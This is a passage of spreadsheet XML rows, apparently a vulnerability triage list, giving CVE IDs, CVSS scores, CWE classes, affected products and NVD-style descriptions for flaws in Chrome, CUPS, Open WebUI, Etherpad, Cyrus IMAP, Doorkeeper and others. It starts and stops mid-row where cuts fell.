      <c r="B5715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87586</t>
        </is>
      </c>
      <c r="C5715" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5715" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5715" s="5" t="inlineStr"/>
      <c r="F5715" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5715" s="5" t="inlineStr"/>
      <c r="H5715" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5715" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5715" s="5" t="inlineStr"/>
      <c r="K5715" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5715" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87586</t>
        </is>
      </c>
    </row>
    <row r="5716">
      <c r="A5716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87592</t>
        </is>
      </c>
      <c r="C5716" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5716" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5716" s="5" t="inlineStr"/>
      <c r="F5716" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5716" s="5" t="inlineStr"/>
      <c r="H5716" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5716" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5716" s="5" t="inlineStr"/>
      <c r="K5716" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5716" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Tint in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87592</t>
        </is>
      </c>
    </row>
    <row r="5717">
      <c r="A5717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87596</t>
        </is>
      </c>
      <c r="C5717" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5717" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5717" s="5" t="inlineStr"/>
      <c r="F5717" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5717" s="5" t="inlineStr"/>
      <c r="H5717" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5717" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5717" s="5" t="inlineStr"/>
      <c r="K5717" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5717" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87596</t>
        </is>
      </c>
    </row>
    <row r="5718">
      <c r="A5718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87598</t>
        </is>
      </c>
      <c r="C5718" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5718" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5718" s="5" t="inlineStr"/>
      <c r="F5718" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5718" s="5" t="inlineStr"/>
      <c r="H5718" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5718" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5718" s="5" t="inlineStr"/>
      <c r="K5718" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5718" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87598</t>
        </is>
      </c>
    </row>
    <row r="5719">
      <c r="A5719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87619</t>
        </is>
      </c>
      <c r="C5719" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5719" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5719" s="5" t="inlineStr"/>
      <c r="F5719" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5719" s="5" t="inlineStr"/>
      <c r="H5719" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5719" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5719" s="5" t="inlineStr"/>
      <c r="K5719" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5719" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Prefetch in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87619</t>
        </is>
      </c>
    </row>
    <row r="5720">
      <c r="A5720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87622</t>
        </is>
      </c>
      <c r="C5720" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5720" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5720" s="5" t="inlineStr"/>
      <c r="F5720" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5720" s="5" t="inlineStr"/>
      <c r="H5720" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5720" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5720" s="5" t="inlineStr"/>
      <c r="K5720" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5720" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87622</t>
        </is>
      </c>
    </row>
    <row r="5721">
      <c r="A5721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87630</t>
        </is>
      </c>
      <c r="C5721" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5721" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5721" s="5" t="inlineStr"/>
      <c r="F5721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5721" s="5" t="inlineStr"/>
      <c r="H5721" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5721" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5721" s="5" t="inlineStr"/>
      <c r="K5721" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L5721" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87630</t>
        </is>
      </c>
    </row>
    <row r="5722">
      <c r="A5722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87632</t>
        </is>
      </c>
      <c r="C5722" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5722" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5722" s="5" t="inlineStr"/>
      <c r="F5722" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5722" s="5" t="inlineStr"/>
      <c r="H5722" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5722" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5722" s="5" t="inlineStr"/>
      <c r="K5722" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5722" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in SanitizerAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87632</t>
        </is>
      </c>
    </row>
    <row r="5723">
      <c r="A5723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87642</t>
        </is>
      </c>
      <c r="C5723" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5723" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5723" s="5" t="inlineStr"/>
      <c r="F5723" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5723" s="5" t="inlineStr"/>
      <c r="H5723" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5723" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5723" s="5" t="inlineStr"/>
      <c r="K5723" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5723" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87642</t>
        </is>
      </c>
    </row>
    <row r="5724">
      <c r="A5724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87651</t>
        </is>
      </c>
      <c r="C5724" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5724" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5724" s="5" t="inlineStr"/>
      <c r="F5724" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5724" s="5" t="inlineStr"/>
      <c r="H5724" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5724" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5724" s="5" t="inlineStr"/>
      <c r="K5724" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5724" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Paint in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87651</t>
        </is>
      </c>
    </row>
    <row r="5725">
      <c r="A5725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87658</t>
        </is>
      </c>
      <c r="C5725" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5725" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5725" s="5" t="inlineStr"/>
      <c r="F5725" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5725" s="5" t="inlineStr"/>
      <c r="H5725" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5725" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5725" s="5" t="inlineStr"/>
      <c r="K5725" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5725" s="5" t="inlineStr">
        <is>
          <t>Information leak in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain cross-origin data via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87658</t>
        </is>
      </c>
    </row>
    <row r="5726">
      <c r="A5726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87735</t>
        </is>
      </c>
      <c r="C5726" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5726" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5726" s="5" t="inlineStr"/>
      <c r="F5726" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5726" s="5" t="inlineStr"/>
      <c r="H5726" s="5" t="inlineStr"/>
      <c r="I5726" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5726" s="5" t="inlineStr"/>
      <c r="K5726" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L5726" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-pk package before 2.3.0 for OCaml. There is an undocumented exception for a small message during RSA decryption or encryption.</t>
        </is>
      </c>
      <c r="M5726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87735</t>
        </is>
      </c>
    </row>
    <row r="5727">
      <c r="A5727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87736</t>
        </is>
      </c>
      <c r="C5727" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5727" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5727" s="5" t="inlineStr"/>
      <c r="F5727" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5727" s="5" t="inlineStr"/>
      <c r="H5727" s="5" t="inlineStr"/>
      <c r="I5727" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5727" s="5" t="inlineStr"/>
      <c r="K5727" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5727" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-ec package before 2.3.0 for OCaml. There is an EC public key out-of-bounds read for compressed points.</t>
        </is>
      </c>
      <c r="M5727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87736</t>
        </is>
      </c>
    </row>
    <row r="5728">
      <c r="A5728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87875</t>
        </is>
      </c>
      <c r="C5728" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5728" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5728" s="5" t="inlineStr"/>
      <c r="F5728" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5728" s="5" t="inlineStr"/>
      <c r="H5728" s="5" t="inlineStr"/>
      <c r="I5728" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5728" s="5" t="inlineStr"/>
      <c r="K5728" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5728" s="5" t="inlineStr">
        <is>
          <t>The cupsUTF32ToUTF8() function in CUPS's cups/transcode.c lacks a source-length bound and can read past the end of the source buffer, resulting in a heap out-of-bounds read. This is reachable via SNMP supply-description parsing in backend/snmp-supplies.c with attacker-controlled content.</t>
        </is>
      </c>
      <c r="M5728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87875</t>
        </is>
      </c>
    </row>
    <row r="5729">
      <c r="A5729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87994</t>
        </is>
      </c>
      <c r="C5729" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5729" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5729" s="5" t="inlineStr"/>
      <c r="F5729" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5729" s="5" t="inlineStr"/>
      <c r="H5729" s="5" t="inlineStr"/>
      <c r="I5729" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5729" s="5" t="inlineStr"/>
      <c r="K5729" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L5729" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, the channel branch of chat_completion in backend/open_webui/main.py checked channel write access and channel membership for a supplied message_id but did not verify that the calling user authored the targeted message. A channel member could use the chat completions endpoint to replace another member's message while preserving the victim as the stored author, altering the conversation record without gaining access to other channels. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M5729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87994</t>
        </is>
      </c>
    </row>
    <row r="5730">
      <c r="A5730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87997</t>
        </is>
      </c>
      <c r="C5730" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5730" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5730" s="5" t="inlineStr"/>
      <c r="F5730" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5730" s="5" t="inlineStr"/>
      <c r="H5730" s="5" t="inlineStr"/>
      <c r="I5730" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5730" s="5" t="inlineStr"/>
      <c r="K5730" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L5730" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, POST /api/chat/completions and POST /api/v1/chat/completions in backend/open_webui/main.py copied a client-supplied folder_id into a new chat without applying the folder write-access check used by the dedicated chat routes. An authenticated user who knew a shared folder identifier could inject an attacker-controlled chat into a folder where the user had read-only or no write access, causing the entry to appear to authorized folder readers. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M5730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87997</t>
        </is>
      </c>
    </row>
    <row r="5731">
      <c r="A5731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9214</t>
        </is>
      </c>
      <c r="C5731" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5731" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5731" s="5" t="inlineStr"/>
      <c r="F5731" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5731" s="5" t="inlineStr"/>
      <c r="H5731" s="5" t="inlineStr">
        <is>
          <t>netgear:r7000, netgear:r7000_firmware</t>
        </is>
      </c>
      <c r="I5731" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5731" s="5" t="inlineStr"/>
      <c r="K5731" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5731" s="5" t="inlineStr">
        <is>
          <t>Insufficient input validation vulnerability in the NETGEAR R7000 models
 allows authenticated administrators connected to the local network to 
make unauthorized modification to router software and functionality.</t>
        </is>
      </c>
      <c r="M5731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9214</t>
        </is>
      </c>
    </row>
    <row r="5732">
      <c r="A5732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9736</t>
        </is>
      </c>
      <c r="C5732" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5732" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5732" s="5" t="inlineStr"/>
      <c r="F5732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5732" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5732" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I5732" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5732" s="5" t="inlineStr"/>
      <c r="K5732" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L5732" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 could allow an unauthorized user to inject data into log messages due to improper neutralization of special elements when written to log files.</t>
        </is>
      </c>
      <c r="M5732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9736</t>
        </is>
      </c>
    </row>
    <row r="5733">
      <c r="A5733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55086</t>
        </is>
      </c>
      <c r="C5733" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5733" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5733" s="5" t="inlineStr"/>
      <c r="F5733" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5733" s="5" t="inlineStr"/>
      <c r="H5733" s="5" t="inlineStr"/>
      <c r="I5733" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5733" s="5" t="inlineStr"/>
      <c r="K5733" s="5" t="inlineStr">
        <is>
          <t>CWE-377, CWE-59</t>
        </is>
      </c>
      <c r="L5733" s="5" t="inlineStr">
        <is>
          <t>Etherpad is a real-time collaborative editor. Prior to 3.1.0, src/node/handler/ImportHandler.ts and src/node/handler/ExportHandler.ts derive temporary filenames from Math.random() and place them in os.tmpdir(). On a host with a shared world-writable temporary directory, a local unprivileged attacker who predicts a filename can precreate a symbolic link to a file writable by the Etherpad process. Subsequent import or export operations can follow the link through fs.writeFile, fs.rename, or document-conversion output and overwrite the target with partially attacker-controlled content. This issue is fixed in version 3.1.0.</t>
        </is>
      </c>
      <c r="M5733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55086</t>
        </is>
      </c>
    </row>
    <row r="5734">
      <c r="A5734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61915</t>
        </is>
      </c>
      <c r="C5734" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5734" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5734" s="5" t="inlineStr"/>
      <c r="F5734" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5734" s="5" t="inlineStr"/>
      <c r="H5734" s="5" t="inlineStr"/>
      <c r="I5734" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5734" s="5" t="inlineStr"/>
      <c r="K5734" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L5734" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a VPATCH BYPARAM double-free. An authenticated calendar user could crash a Cyrus CalDAV worker with a PATCH containing PATCH-ACTION="BYPARAM@..." against a resource with two or more properties of the matched kind. The memory holding the selector would be freed once on each iteration over the properties.</t>
        </is>
      </c>
      <c r="M5734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61915</t>
        </is>
      </c>
    </row>
    <row r="5735">
      <c r="A5735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70665</t>
        </is>
      </c>
      <c r="C5735" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5735" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5735" s="5" t="inlineStr"/>
      <c r="F5735" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5735" s="5" t="inlineStr"/>
      <c r="H5735" s="5" t="inlineStr"/>
      <c r="I5735" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5735" s="5" t="inlineStr"/>
      <c r="K5735" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L5735" s="5" t="inlineStr">
        <is>
          <t>Doorkeeper OpenID Connect implements an OpenID Connect authentication provider for Rails applications on top of Doorkeeper. Prior to 1.10.4, the Dynamic Client Registration (DCR) endpoint persists client-supplied scopes without validating them against the server's configured scope set. Under certain conditions, this allows a self-registered client to obtain scopes beyond what the server intended to grant. In DynamicClientRegistrationController#application_params, the scopes attribute is assigned directly from params[:scope] with no validation against Doorkeeper.configuration.scopes or optional_scopes. Combined with enforce_configured_scopes being off by default and Doorkeeper's ScopeChecker prioritizing application-level scopes over server-level scopes, this creates a privilege escalation path. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="M5735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70665</t>
        </is>
      </c>
    </row>
    <row r="5736">
      <c r="A5736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73657</t>
        </is>
      </c>
      <c r="C5736" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="D5736" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5736" s="5" t="inlineStr"/>
      <c r="F5736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5736" s="5" t="inlineStr"/>
      <c r="H5736" s="5" t="inlineStr"/>
      <c r="I5736" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5736" s="5" t="inlineStr"/>
      <c r="K5736" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-345, CWE-639</t>
        </is>
      </c>
      <c r="L5736" s="5" t="inlineStr">
        <is>
